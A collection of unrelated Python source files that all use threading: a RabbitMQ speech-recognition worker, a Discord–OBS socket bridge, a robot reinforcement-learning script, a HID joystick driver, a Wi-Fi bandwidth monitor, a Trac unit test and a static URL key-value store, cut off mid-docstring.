| source | python |
|---|---|
worker.py
|
import pika
import time
from DAO.connection import Connection
import os
import multiprocessing
import json
import logging
import ast
from asr.client2 import main
import threading
import functools
LOG_FORMAT = ('%(levelname) -10s %(asctime)s %(name) -30s %(funcName) '
'-35s %(lineno) -5d: %(message)s')
LOGGER = logging.getLogger(__name__)
def callback(channel, method, properties, body, args):
(connection, threads) = args
delivery_tag = method.delivery_tag
t = threading.Thread(target=do_work, args=(connection, channel, delivery_tag, body))
t.start()
threads.append(t)
def do_work(connection, channel, delivery_tag, body):
try:
print(" [x] Received %r" % body, flush=True)
message_in = json.loads(body)
oid = message_in['oid']
project_id = message_in['project_id']
conn = Connection()
# file = conn.get_file(oid)
file = conn.get_doc_mongo(file_oid=oid)
result = ast.literal_eval(file.decode('utf-8'))
#print(result, flush=True)
count = 0
dict_result = {}
previous_duration = 0
for key, value in result.items():
# run ASR on each chunk; use a separate name so the dict being iterated is not overwritten
asr_result = main(value['bytes'])
dict_result[count] = asr_result
count += 1
#time.sleep(1)
payload = bytes(str(dict_result), encoding='utf-8')
conn = Connection()
# inserts the result of processing in database
file_oid = conn.insert_doc_mongo(payload)
conn.insert_jobs(type='asr', status='done', file=file_oid, project_id=project_id)
message = {'type': 'aggregator', 'status': 'new', 'oid': file_oid, 'project_id': project_id}
# post a message on the aggregator queue
connection_out = pika.BlockingConnection(pika.ConnectionParameters(host=os.environ['QUEUE_SERVER']))
channel2 = connection_out.channel()
channel2.queue_declare(queue='aggregator', durable=True)
channel2.basic_publish(exchange='', routing_key='aggregator', body=json.dumps(message))
connection_out.close()
except Exception as e:
print('Error while processing message: %s' % e, flush=True)
print(" [x] Done", flush=True)
cb = functools.partial(ack_message, channel, delivery_tag)
connection.add_callback_threadsafe(cb)
def ack_message(channel, delivery_tag):
"""Note that `channel` must be the same pika channel instance via which
the message being ACKed was retrieved (AMQP protocol constraint).
"""
if channel.is_open:
channel.basic_ack(delivery_tag)
else:
# Channel is already closed, so we can't ACK this message; log it so the loss is visible.
LOGGER.warning('Channel closed before message %s could be acknowledged', delivery_tag)
def consume():
logging.info('[x] start consuming')
success = False
while not success:
try:
connection = pika.BlockingConnection(
pika.ConnectionParameters(host=os.environ['QUEUE_SERVER'], heartbeat=5))
channel = connection.channel()
success = True
except Exception:
# broker not reachable yet; wait and retry
time.sleep(30)
channel.queue_declare(queue='asr', durable=True)
print(' [*] Waiting for messages. To exit press CTRL+C')
channel.basic_qos(prefetch_count=1)
threads = []
on_message_callback = functools.partial(callback, args=(connection, threads))
channel.basic_consume(queue='asr', on_message_callback=on_message_callback)
try:
channel.start_consuming()
except KeyboardInterrupt:
channel.stop_consuming()
# Wait for all to complete
for thread in threads:
thread.join()
connection.close()
consume()
'''
workers = int(os.environ['NUM_WORKERS'])
pool = multiprocessing.Pool(processes=workers)
for i in range(0, workers):
pool.apply_async(consume)
# Stay alive
try:
while True:
continue
except KeyboardInterrupt:
print(' [*] Exiting...')
pool.terminate()
pool.join()'''
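# A minimal producer sketch (commented out, not part of the worker): it shows how a test
# message shaped like the ones this worker consumes could be published to the 'asr' queue.
# The oid/project_id values are placeholders; QUEUE_SERVER is the same env var used above.
#
# def publish_test_message(oid, project_id):
#     conn = pika.BlockingConnection(pika.ConnectionParameters(host=os.environ['QUEUE_SERVER']))
#     ch = conn.channel()
#     ch.queue_declare(queue='asr', durable=True)
#     ch.basic_publish(exchange='', routing_key='asr',
#                      body=json.dumps({'oid': oid, 'project_id': project_id}))
#     conn.close()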
|
vlc_discord_server.py
|
import socket # For hosting a server that communicates w/ OBS script
import asyncio # For handling multiple connections
import discord # Requires "pip install discord.py" module for interacting with discord
from dotenv import load_dotenv # Loading environment variables
import os # Getting environment variables
import json # For exporting and importing files
import ast # For safely parsing the Python-literal list sent by the OBS script
import threading # To run both Discord and Server at same time
import discord_messages as dms
### DISCORD STUFF
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
client = discord.Client()
@client.event
async def on_ready():
print(f'{client.user} has connected to Discord!')
@client.event
async def on_message(message):
# Ignore our own messages before doing anything else
if message.author == client.user:
return
server_id = str(message.guild.id) + "." + str(message.author.id)
# TODO: Add a message prefix, and save to local json file
if message.content == 'list':
response = await handle_task(server_id, "LIST_LIBRARY")
video_list = ast.literal_eval(response) # the OBS script replies with a Python-literal list
await dms.send_video_list(client, video_list, message.channel.id)
if message.content.startswith('search'):
args = message.content.replace("search","",1) # Replaces maximum of 1 use of term 'search' - leaving just the following arguments
response = await handle_task(server_id, "SEARCH", args)
await message.channel.send(response)
if message.content == 'join':
response = "Please enter the following into your OBS Script: " + server_id
await message.channel.send(response)
async def send_dm(message, user_id):
user = await client.fetch_user(user_id)
print("Sending message to: ", user, "\n",message)
await user.send(message)
#TODO: Split out this embed code into a separate file determining how messages should look
#client.run(TOKEN)
### END DISCORD STUFF
clients = {} # uses Task as key and (reader,writer) as value
server_ids = {}
HOST = '' # Empty string means assign to all interfaces
PORT = 8420
async def handle_task(server_id, task, arg=None):
global server_ids
print("Looking for server: " + str(server_id))
print("Current servers connected: " + str(server_ids))
if server_id in server_ids:
client_reader, client_writer = server_ids[server_id]
response = await handle_client(client_reader,client_writer,task, arg)
if response == "":
response = "No message received from Client"
return response
else:
return "No OBS script connected"
def accept_client(client_reader,client_writer):
global clients
task = asyncio.Task(handle_client(client_reader,client_writer,"HELLO"))
clients[task] = (client_reader, client_writer)
def delete_client(task):
del clients[task]
client_writer.close()
#task.add_done_callback(delete_client)
async def handle_client(client_reader, client_writer, task, arg=None):
global server_ids
try:
client_writer.write("Hello\n".encode())
await client_writer.drain()
data = await asyncio.wait_for(client_reader.readline(), 5) # Wait for 5 seconds
if not data: # readline() returns an empty bytes object when the client sends nothing
print("I'm getting no data from the client")
return ""
string_data = data.decode().rstrip()
if "Heyo" not in string_data:
print("Not getting the expected response from the client")
return ""
else:
print("Client says: Heyo")
server_id = string_data.split(':')[1]
print("Server connected: " + server_id)
# TODO: Only send this on initial connection, not on subsequent commands
if server_id not in server_ids:
await send_dm("OBS client connected from: " + str(client_writer.get_extra_info('peername')[0]), server_id.split('.')[1])
# TODO: If there's already a server connected here, close it properly, then set a new one
server_ids[server_id] = (client_reader, client_writer)
if arg:
task = task + "~" + arg + "\n" #add arg delimited by ~
else:
task = task + "\n" # append to make it a single line
client_writer.write(task.encode())
await client_writer.drain()
data = await asyncio.wait_for(client_reader.readline(), 5)
string_data = data.decode().rstrip()
print("Received data: " + string_data)
return string_data
except ConnectionResetError:
return "Client has been disconnected"
except asyncio.TimeoutError:
return "Connection timed out"
def main():
loop = asyncio.get_event_loop()
server_task = asyncio.start_server(accept_client, HOST, PORT)
loop.run_until_complete(server_task)
# client.run() blocks and manages its own event loop; schedule the client.start() coroutine instead
loop.create_task(client.start(TOKEN))
loop.run_forever()
if __name__ == '__main__':
main()
#
# async def handle_connection(reader,writer):
# data = await reader.read(100)
# message = data.decode()
# addr = writer.get_extra_info('peername')
# print("Received: " + message + " from " + str(addr))
# writer.write("Hello")
# await writer.drain()
# print("Closing")
# writer.close()
#
# async def start_server(HOST,PORT):
# loop = asyncio.get_event_loop()
# coro = asyncio.start_server(handle_connection, HOST, PORT, loop=loop)
# # THere's an issue with this line that causes it to never complete :/
# server = loop.run_until_complete(coro)
#
# print('Serving on {}'.format(server.sockets[0].getsockname()))
# try:
# loop.run_forever()
# except KeyboardInterrupt:
# pass
#
# server.close()
# loop.run_until_complete(server.wait_closed())
# loop.close()
#
# if __name__ == '__main__':
# t1 = threading.Thread(target=client.run, args=(TOKEN))
# await start_server(HOST,PORT)
# t1.start()
#
# with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as serversock:
# serversock.bind((HOST, PORT))
# serversock.listen(5)
# while True:
# # Accept a connection from external
# clientsock, addr = serversock.accept()
# with clientsock:
# print("Connected to by: ", addr)
# token = clientsock.recv(MSG_LENGTH)
# #command = input("Please enter command")
# #command_bytes = command.encode('utf-8')
# clientsock.sendall(command_bytes)
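# A minimal sketch of the OBS-script side of the handshake implemented in handle_client()
# above (commented out; the real OBS script lives elsewhere). The server_id value is the
# "<guild_id>.<user_id>" string that the 'join' command prints; host/port are assumptions.
#
# import socket
#
# def obs_client_sketch(server_id, host='localhost', port=8420):
#     with socket.create_connection((host, port)) as sock:
#         f = sock.makefile('rw')
#         f.readline()                          # server greets with "Hello"
#         f.write("Heyo:" + server_id + "\n")   # identify this OBS script
#         f.flush()
#         task = f.readline().rstrip()          # e.g. "LIST_LIBRARY" or "SEARCH~<args>"
#         f.write(str([]) + "\n")               # reply with a single result line
#         f.flush()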
|
gym_reach7dof_train_1a.py
|
#### Training agent in Pusher7Dof gym env using a single real-world env
## 1a,1b : Trying threading for running rendering in parallel while taking actions
## Written by : leopauly | cnlp@leeds.ac.uk
## Courtesy for DDPG implementation : Steven Spielberg Pon Kumar (github.com/stevenpjg)
####
##Imports
import gym
from gym.spaces import Box, Discrete
import numpy as np
import cv2
from ddpg import DDPG
from ou_noise import OUNoise
import matplotlib.pyplot as plt
import scipy.misc as misc
## Imports for DNN
import os
from threading import Thread, Lock
import sys
from six.moves import xrange # pylint: disable=redefined-builtin
import PIL.Image as Image
import random
import numpy as np
import cv2
import time
import math
import matplotlib.pyplot as plt
import tensorflow as tf
from keras import backend as K
## Custom scripts
import lscript as lsp
import modelling as md
## Defining env
env = gym.make('Pusher7DOF-v1')
env.reset()
assert isinstance(env.observation_space, Box), "observation space must be continuous"
assert isinstance(env.action_space, Box), "action space must be continuous"
## Defining vars for reinforcement learning algo
num_episodes=1000
num_rollouts=200
steps=num_rollouts
is_batch_norm = False #batch normalization switch
xrange=range
start_training=64
## vars for feature extraction
height=112
width=112
channel=3
crop_size=112
cluster_length=16
nb_classes=2
feature_size=4608 #8192 #16384 #487
saved_path='/home/ironman/trained_activity_nets/'
batch_size=32
demo_folder='./Demo_reach_1/'
## Defining placeholders in tf for images and targets
x_image = tf.placeholder(tf.float32, [None, 16,height,width,channel],name='x')
y_true = tf.placeholder(tf.float32, [None, nb_classes],name='y_true')
y_true_cls = tf.placeholder(tf.int64, [None],name='y_true_cls')
model_keras = md.C3D_ucf101_training_model_tf(summary=True)
out=model_keras(x_image)
y_pred = tf.nn.softmax(out)
y_pred_cls = tf.argmax(out, dimension=1)
correct_prediction = tf.equal(y_pred_cls, y_true_cls)
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Loading network framework finished..!!',flush=True)
def get_compress_frames_data(filename, num_frames_per_clip=cluster_length):
ret_arr = []
for parent, dirnames, filenames in os.walk(filename):
filenames = sorted(filenames)
jump=math.floor((len(filenames)/num_frames_per_clip))
loop=0
for i in range(0,len(filenames),jump):
if (loop>15):
break
if (filenames[i].endswith('.png')):
image_name = str(filename) + '/' + str(filenames[i])
img = Image.open(image_name)
img_data = np.array(img)
ret_arr.append(img_data)
loop=loop+1
ret_arr=np.array(ret_arr)
#ret_arr=ret_arr/255
return ret_arr
## Start the session with logging placement.
init_op = tf.global_variables_initializer()
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=False))
sess.run(init_op)
## Restore model weights from previously saved model
saver = tf.train.import_meta_graph(os.path.join(saved_path,'activity_model.ckpt-104.meta'))
saver.restore(sess, os.path.join(saved_path,'activity_model.ckpt-104'))
print("Model restored from file: %s" % saved_path,flush=True)
def demo_feature_extractor(demo_vid_path):
demo_vid_array=get_compress_frames_data(demo_vid_path)
return feature_extractor(demo_vid_array)
## For extracting activity features
def feature_extractor(vid_np):
#print('shape of video for feature extraction:',vid_np.shape)
vid_=vid_np.reshape(-1,cluster_length,height,width,channel)
#print(tf.contrib.graph_editor.get_tensors(tf.get_default_graph()))
#print(tf.get_default_graph().as_graph_def())
f_v = sess.graph.get_tensor_by_name('flatten_1/Reshape:0')
f_v_val=np.array(sess.run([f_v], feed_dict={'conv1_input:0':vid_,x_image:vid_,K.learning_phase(): 0 }))
#print('extracted video features shape:',f_v_val.shape)
features=np.reshape(f_v_val,(-1))
#print('features_shape',features.shape)
return features
def distance(f_demo,f_robo):
#print('shape f_demo',f_demo.shape,'shape f_demo',f_robo.shape)
return np.linalg.norm(f_demo-f_robo)
def s2l():
#Randomly initialize critic,actor,target critic, target actor network and replay buffer
num_states = feature_size #num_states = env.observation_space.shape[0]
num_actions = env.action_space.shape[0]
print ("Number of States:", num_states)
print ("Number of Actions:", num_actions)
agent = DDPG(env, is_batch_norm,num_states,num_actions)
exploration_noise = OUNoise(env.action_space.shape[0])
counter=0
reward_per_episode = 0
total_reward=0
print ("Number of Steps per episode:", steps)
reward_st = np.array([0]) #saving reward
demo_features=demo_feature_extractor(demo_folder)
for episode in range(num_episodes):
print ("==== Starting episode no:",episode,"====","\n")
env.reset() # Reset env in the begining of each episode
env.render()
obs_vid=[]
for i in range(16):
obs_img=env.render(mode='rgb_array') # Get the observation
obs_new=misc.imresize(obs_img,[112,112,3])
obs_vid.append(obs_new)
obs_vid=np.array(obs_vid)
observation =feature_extractor(obs_vid)
reward_per_episode = 0
for t in range(steps):
x = observation
action = agent.evaluate_actor(np.reshape(x,[1,num_states]))
noise = exploration_noise.noise()
action = action[0] + noise #Select action according to current policy and exploration noise
print ("Action at step", t ," :",action,"\n")
child_thread = Thread(target=child_function)
child_thread.start()
with io_lock:
_,_,done,info=env.step(action)
env.render()
print("Parent process continuing.")
vid_robo_=[]
for i in range(16):
obs=env.render(mode='rgb_array') # Get the observation
obs_new=misc.imresize(obs,[112,112,3])
vid_robo_.append(obs_new)
vid_robo=np.array(vid_robo_)
robo_features=feature_extractor(vid_robo)
observation=robo_features
reward=-(distance(demo_features,robo_features))
print('reward: ',reward)
#add s_t,s_t+1,action,reward to experience memory
agent.add_experience(x,observation,action,reward,done)
#train critic and actor network
if counter > start_training:
agent.train()
reward_per_episode+=reward
counter+=1
#check if episode ends:
if (done or (t == steps-1)):
print ('EPISODE: ',episode,' Steps: ',t,' Total Reward: ',reward_per_episode)
print ("Printing reward to file")
exploration_noise.reset() #reinitializing random noise for action exploration
reward_st = np.append(reward_st,reward_per_episode)
np.savetxt('episode_reward.txt',reward_st, newline="\n")
print ('\n\n')
break
total_reward+=reward_per_episode
print ("Average reward per episode {}".format(total_reward / episodes))
def child_function():
i = 1000*20394
print("Child starts recording. Did stuff: " + str(i))
return
io_lock = Lock()
s2l()
|
JoyHIDOutput.py
|
'''
Created on Nov 22, 2021
@author: Japi42
'''
import threading
from struct import pack
from Outputs.Output import Output
condition = threading.Condition()
inited = False
x_axis = 0
y_axis = 0
my_buttons = 0
dirty = False
devhandle = None
# Need a thread for working
# Need a condition for thread safety
# Need an array of states for output
def startup():
global inited
if not inited:
print("Starting up Update Joystick Thread")
ut = threading.Thread(name='UpdateJoystickThread', target=updateJoystickThread)
ut.start()
inited = True
def setButton(button, state):
global my_buttons
global condition
global dirty
with condition:
if state:
my_buttons |= (1<<button)
else:
my_buttons &= ~(1<<button)
dirty = True
condition.notify_all()
def initJoystick(devname="/dev/hidg0"):
global devhandle
global dirty
global x_axis, y_axis, my_buttons
print("Initing joystick")
devhandle = open(devname, 'wb+')
x_axis = 0
y_axis = 0
my_buttons = 0
dirty = False
report = buildHIDReport()
writeHIDReport(report)
print("Init done")
def writeHIDReport(report):
global devhandle
devhandle.write(report)
devhandle.flush()
def buildHIDReport():
report = pack('<bbH', x_axis, y_axis, my_buttons)
return report
def updateJoystickThread():
global condition
global dirty
initJoystick()
while True:
with condition:
condition.wait_for(checkControlsUpdate)
report = pack('<bbH', x_axis, y_axis, my_buttons)
dirty = False
writeHIDReport(report)
def checkControlsUpdate():
global condition
global dirty
with condition:
return dirty
class JoyHIDOutput(Output):
def __init__(self, output_id, button_num):
Output.__init__(self)
self.id = output_id
self.button_num = button_num
startup()
def setState(self, state):
with self.condition:
self.state = state
setButton(self.button_num, state)
print(str(self.id) + " changed to " + str(state))
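# A minimal usage sketch (commented out): JoyHIDOutput instances share the module-level
# HID report state, so creating one per button and toggling it drives the gadget at
# /dev/hidg0. The output ids and button numbers below are illustrative only.
#
# fire_button = JoyHIDOutput(output_id="fire", button_num=0)
# jump_button = JoyHIDOutput(output_id="jump", button_num=1)
# fire_button.setState(True)    # press button 0
# fire_button.setState(False)   # release button 0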
|
tcc-teste.py
|
#!/usr/bin/python2.7
import time
from threading import Thread
import threading, Queue
class cabeca(object):
def __init__(self):
self.nome = None
def check_infos(user_id, queue):
result = user_id+5*2+4*20
queue.put(result)
def soma(i):
return i+5*2+4*20
queued_request = Queue.Queue()
lista_teste = []
lista_teste_2 = []
for i in range(6000):
lista_teste.append(i+3)
lista_teste_2.append(i+10)
tempo = time.clock()
for i in range(6000):
check_infos_thread = threading.Thread(target=check_infos, args=(lista_teste[i], queued_request))
check_infos_thread.start()
final_result = queued_request.get()
lista_teste[i] = final_result
print "Tempo Thread %s"%(time.clock()-tempo)
tempo = time.clock()
for i in range(6000):
teste = soma(lista_teste_2[i])
lista_teste_2[i] = teste
print "Tempo Normal %s"%(time.clock()-tempo)
#print lista_teste
cabeca = cabeca()
cabeca.nome = "Felipe"
for i in range(2):
lista_teste[i] = cabeca
print lista_teste[0].nome
|
Network.py
|
import Device
from scapy.all import *
import threading
from pylab import *
import matplotlib.pyplot as plt
import time
import os
class Network:
num_devices = 0
device_list = {}
bwUsageHistory = {}
def Join_device(self, mac_addr, ip_addr=None):
dev = Device.device(mac_addr, ip_addr)
self.device_list[mac_addr] = dev
print 'Join the device %s' %(mac_addr)
def Does_Device_Exist (self, mac_addr) :
return mac_addr in self.device_list
def Delete_device(self, mac_addr):
del self.device_list[mac_addr]
print 'Delete the device'
def plotUSage (self, sleepCount ) :
xdata = []
ydata = []
positions = []
count = 0
totalBandwidth = 0
for mac, device in self.device_list.items():
xdata.append(mac)
deviceBandwidth = device.get_bandwidth()
device.reset_bandwidth()
totalBandwidth = totalBandwidth + deviceBandwidth
ydata.append(deviceBandwidth)
positions.append(count+0.5)
count = count + 0.5
bar(positions,ydata, align='center')
xticks(positions, xdata)
ylabel('Bandwidth')
title('Total bandwidth usage in last 5 min')
grid(True)
savefig("usage5Min.png")
plt.clf()
print 'Plot image is ready. Name %s' %('usage5Min.png')
if (sleepCount % 6 == 0):
print '## Printing total usage %s' %(totalBandwidth)
self.bwUsageHistory[sleepCount/6] = totalBandwidth
times = self.bwUsageHistory.keys()
totals = self.bwUsageHistory.values()
plt.plot(times, totals)
grid(True)
os.system('/bin/mv totalUsage.png totalUsageSofar.png')
savefig("totalUsage.png")
plt.clf()
def Display_devices(self):
pass
def Process_packet(self, pkt = None):
for key, value in pkt.items():
self.device_list[key].consume_bandwidth(value)
def PktHeaderParser (pkt):
if pkt.haslayer(Dot11):
wrlsHdr = pkt[Dot11]
dst = wrlsHdr.fields['addr1']
src = wrlsHdr.fields['addr2']
addr3 = wrlsHdr.fields['addr3']
if src != None:
if not network.Does_Device_Exist (src):
network.Join_device (src)
network.Process_packet({ src: len(pkt)})
def startMonitor():
sniff(iface="mon0", prn = PktHeaderParser)
global network
if __name__=="__main__":
network = Network()
t= threading.Thread(target=startMonitor)
t.start()
sleepCount = 0
while True:
time.sleep(3)
sleepCount +=1
network.plotUSage(sleepCount)
|
mmc_positioner.py
|
"""
Mock MMC support in ophyd/Bluesky
"""
from ophyd import Component
from ophyd import Signal
from ophyd.mixins import SignalPositionerMixin
from ophyd.status import MoveStatus
from sim_mmc_controller import SimMMC
import threading
import time
import warnings
class SoftMMCPositioner(SignalPositionerMixin, Signal):
_move_thread = None
def __init__(self, *args, mmc=None, mmc_label="", **kwargs):
self.mmc = mmc
self.mmc_label = mmc_label
super().__init__(*args, set_func=self._write_xy, **kwargs)
# get the position from the controller on startup
self._readback = self.mmc.getXYPosition()
def _write_xy(self, value, **kwargs):
if self._move_thread is not None:
# The MoveStatus object defends us; this is just an additional safeguard.
# Do not ever expect to see this warning.
warnings.warn("Already moving. Will not start new move.")
st = MoveStatus(self, target=value)
def moveXY():
self.mmc.setXYPosition(value)
# ALWAYS wait for the device
self.mmc.waitForDevice(self.mmc_label)
# update the _readback attribute (which triggers other ophyd actions)
self._readback = self.mmc.getXYPosition()
# MUST set to None BEFORE declaring status True
self._move_thread = None
st.set_finished()
self._move_thread = threading.Thread(target=moveXY)
self._move_thread.start()
return st
def demonstrate_mmc_positioner(mmc):
# What's it look like?
print(f"{mmc = }")
# Will it set()?
st = mmc.set((2.1, -.1))
print(f"{st = }")
while not st.done:
time.sleep(0.26)
print(f"{st = }")
print(f"{mmc = }")
# Will it get()?
try:
print(f"{mmc.get() = }")
except Exception as exc:
print(f"{exc = }")
# Will it put()?
try:
t0 = time.time()
print(f"{mmc.put((4, .2)) = }")
print(f"{time.time()-t0:f}s")
print(f"{mmc = }")
except Exception as exc:
print(f"{exc = }")
# Will it read()?
print(f"{mmc.read() = }")
# Will it move()?
try:
t0 = time.time()
print(f"{mmc.move((.6, -.7)) = }")
print(f"{time.time()-t0:f}s")
print(f"{mmc = }")
print(f"{mmc.position = }")
except Exception as exc:
print(f"{exc = }")
|
concurrency.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import threading
import unittest
from trac.util.concurrency import ThreadLocal
class ThreadLocalTestCase(unittest.TestCase):
def test_thread_local(self):
local = ThreadLocal(a=1, b=2)
local.b = 3
local.c = 4
local_dict = [local.__dict__.copy()]
def f():
local.b = 5
local.d = 6
local_dict.append(local.__dict__.copy())
thread = threading.Thread(target=f)
thread.start()
thread.join()
self.assertEqual(dict(a=1, b=3, c=4), local_dict[0])
self.assertEqual(dict(a=1, b=5, d=6), local_dict[1])
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(ThreadLocalTestCase, 'test'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
static_url_store.py
|
#
# (C) Copyright 2012 Enthought, Inc., Austin, TX
# All right reserved.
#
# This file is open source software distributed according to the terms in LICENSE.txt
#
"""
Static URL Store
================
This module contains the :py:class:`~StaticURLStore` store that communicates
with a remote HTTP server which provides the actual data storage. This is a
simple read-only store that can be run against a static HTTP server which
provides a json file with all metadata and then serves data from URLs from
another path. The metadata URL is polled periodically for updates.
A typical static server might be laid out as::
base_directory/
index.json
data/
key1
key2
...
"""
import threading
import json
from six.moves import urllib
import time
from .abstract_store import AbstractReadOnlyStore
from .events import StoreUpdateEvent, StoreSetEvent, StoreDeleteEvent
from .url_value import URLValue
from .utils import add_context_manager_support
def basic_auth_factory(**kwargs):
""" A factory that creates a :py:class:`~.HTTPBasicAuthHandler` instance
The arguments are passed directly through to the :py:meth:`add_password`
method of the handler.
"""
auth_handler = urllib.request.HTTPBasicAuthHandler()
auth_handler.add_password(**kwargs)
return auth_handler
class StaticURLStore(AbstractReadOnlyStore):
""" A read-only key-value store that is a front end for data served via URLs
All data is assumed to be served from some root url. In addition
the store requires knowledge of two paths: a data prefix URL which is a
partial URL to which the keys will be appended when requesting data, and a
query URL which is a single URL which provides all metadata as a json
encoded file.
For example, an HTTP server may store data at URLs of the form::
http://www.example.com/data/<key>
and may store the metadata at::
http://www.example.com/index.json
These would have a root url of "http://www.example.com/", a data path
of "data/" and a query path of "index.json".
All queries are performed using urllib.urlopen, so this store can be
implemented by an HTTP, FTP or file server which serves static files. When
connecting, if appropriate credentials are supplied then HTTP authentication
will be used when connecting to the remote server.
.. warning::
Since we use urllib without any further modifications, HTTPS requests
do not validate the server's certificate.
Because of the limited nature of the interface, this store implementation
is read only, and handles updates via periodic polling of the query prefix
URL. This guarantees that the viewed data is always consistent; it just may
not be current. Most of the work of querying is done on the client side
using the cached metadata.
Parameters
----------
event_manager :
An event_manager which implements the :py:class:`~.abstract_event_manager.BaseEventManager`
API.
root_url : str
The base url that data is served from.
data_path : str
The URL prefix that the data is served from.
query_path : str
The URL that the metadata is served from.
poll : float
The polling frequency for the polling thread. Polls every 5 min by default.
"""
def __init__(self, root_url, data_path, query_path, poll=300):
super(StaticURLStore, self).__init__()
self.root_url = root_url
self.data_path = data_path
self.query_path = query_path
self.poll = poll
self._opener = None
self._index = None
self._index_lock = threading.Lock()
self._index_thread = None
def connect(self,
credentials=None,
proxy_handler=None,
auth_handler_factory=None):
""" Connect to the key-value store, optionally with authentication
This method creates appropriate urllib openers for the store.
Parameters
----------
credentials : dict
A dictionary which has at least keys 'username' and 'password'
and optional keys 'uri' and 'realm'. The 'uri' will default to
the root url of the store, and 'realm' will default to
'encore.storage'.
proxy_handler : urllib.ProxyHandler
An optional urllib.ProxyHandler instance. If none is provided
then urllib will create a proxy handler from the user's environment
if needed.
auth_handler_factory :
An optional factory to build urllib authenticators. The credentials
will be passed as keyword arguments to this handler's add_password
method.
"""
if credentials is not None:
if auth_handler_factory is None:
auth_handler_factory = urllib.request.HTTPBasicAuthHandler
args = {'uri': self.root_url, 'realm': 'encore.storage'}
args.update(credentials)
auth_handler = auth_handler_factory()
auth_handler.add_password(**args)
if proxy_handler is None:
self._opener = urllib.request.build_opener(auth_handler)
else:
self._opener = urllib.request.build_opener(proxy_handler,
auth_handler)
else:
if proxy_handler is None:
self._opener = urllib.request.build_opener()
else:
self._opener = urllib.request.build_opener(proxy_handler)
self.update_index()
if self.poll > 0:
self._index_thread = threading.Thread(target=self._poll)
self._index_thread.start()
def disconnect(self):
""" Disconnect from the key-value store
This method disposes of or disconnects from any long-lived resources that
the store requires.
"""
# Clear the opener first so the polling loop in _poll() exits and the thread can be joined
self._opener = None
if self._index_thread is not None:
self._index_thread.join()
self._index_thread = None
def is_connected(self):
""" Whether or not the store is currently connected
Returns
-------
connected : bool
Whether or not the store is currently connected.
"""
return self._opener is not None
def info(self):
""" Get information about the key-value store
Returns
-------
metadata : dict
A dictionary of metadata giving information about the key-value store.
"""
return {'readonly': True}
##########################################################################
# Basic Create/Read/Update/Delete Methods
##########################################################################
def get(self, key):
""" Retrieve a stream of data and metdata from a given key in the key-value store.
Parameters
----------
key : string
The key for the resource in the key-value store. The key is a unique
identifier for the resource within the key-value store.
Returns
-------
data : file-like
A readable file-like object that provides a stream of data from the
key-value store. This is the same type of file-like object returned
by urllib's urlopen function.
metadata : dictionary
A dictionary of metadata for the key.
Raises
------
KeyError :
If the key is not found in the store, a KeyError is raised.
"""
url = self.root_url + urllib.parse.quote(self.data_path + key)
with self._index_lock:
metadata = self._index[key].copy()
return URLValue(url, metadata, self._opener)
def get_data(self, key):
""" Retrieve a stream from a given key in the key-value store.
Parameters
----------
key : string
The key for the resource in the key-value store. The key is a unique
identifier for the resource within the key-value store.
Returns
-------
data : file-like
A readable file-like object that provides a stream of data from the
key-value store. This is the same type of file-like object returned
by urllib's urlopen function.
Raises
------
KeyError :
This will raise a key error if the key is not present in the store.
"""
if self.exists(key):
url = self.root_url + urllib.parse.quote(self.data_path + key)
stream = self._opener.open(url)
add_context_manager_support(stream)
return stream
else:
raise KeyError(key)
def get_metadata(self, key, select=None):
""" Retrieve the metadata for a given key in the key-value store.
Parameters
----------
key : string
The key for the resource in the key-value store. The key is a unique
identifier for the resource within the key-value store.
select : iterable of strings or None
Which metadata keys to populate in the result. If unspecified, then
return the entire metadata dictionary.
Returns
-------
metadata : dict
A dictionary of metadata associated with the key. The dictionary
has keys as specified by the select argument. If a key specified in
select is not present in the metadata, then it will not be present
in the returned value.
Raises
------
KeyError :
This will raise a key error if the key is not present in the store.
"""
with self._index_lock:
if select is None:
return self._index[key].copy()
else:
metadata = self._index[key]
return dict((s, metadata[s]) for s in select if s in metadata)
def exists(self, key):
""" Test whether or not a key exists in the key-value store
Parameters
----------
key : string
The key for the resource in the key-value store. The key is a unique
identifier for the resource within the key-value store.
Returns
-------
exists : bool
Whether or not the key exists in the key-value store.
"""
with self._index_lock:
return key in self._index
##########################################################################
# Querying Methods
##########################################################################
def query(self, select=None, **kwargs):
""" Query for keys and metadata matching metadata provided as keyword arguments
This provides a very simple querying interface that returns precise
matches with the metadata. If no arguments are supplied, the query
will return the complete set of metadata for the key-value store.
Parameters
----------
select : iterable of strings or None
An optional list of metadata keys to return. If this is not None,
then the metadata dictionaries will only have values for the specified
keys populated.
kwargs :
Arguments where the keywords are metadata keys, and values are
possible values for that metadata item.
Returns
-------
result : iterable
An iterable of (key, metadata) tuples where metadata matches
all the specified values for the specified metadata keywords.
If a key specified in select is not present in the metadata of a
particular key, then it will not be present in the returned value.
"""
with self._index_lock:
if select is not None:
for key, metadata in list(self._index.items()):
if all(
metadata.get(arg) == value
for arg, value in list(kwargs.items())):
yield key, dict((metadata_key, metadata[metadata_key])
for metadata_key in select
if metadata_key in metadata)
else:
for key, metadata in list(self._index.items()):
if all(
metadata.get(arg) == value
for arg, value in list(kwargs.items())):
yield key, metadata.copy()
def query_keys(self, **kwargs):
""" Query for keys matching metadata provided as keyword arguments
This provides a very simple querying interface that returns precise
matches with the metadata. If no arguments are supplied, the query
will return the complete set of keys for the key-value store.
This is equivalent to ``self.query(**kwargs).keys()``, but potentially
more efficiently implemented.
Parameters
----------
kwargs :
Arguments where the keywords are metadata keys, and values are
possible values for that metadata item.
Returns
-------
result : iterable
An iterable of key-value store keys whose metadata matches all the
specified values for the specified metadata keywords.
"""
with self._index_lock:
for key, metadata in list(self._index.items()):
if all(
metadata.get(arg) == value
for arg, value in list(kwargs.items())):
yield key
##########################################################################
# Utility Methods
##########################################################################
def update_index(self):
""" Request the most recent version of the metadata
This downloads the json file at the query_path location, and updates
the local metadata cache with this information. It then emits events
that represent the difference between the old metadata and the new
metadata.
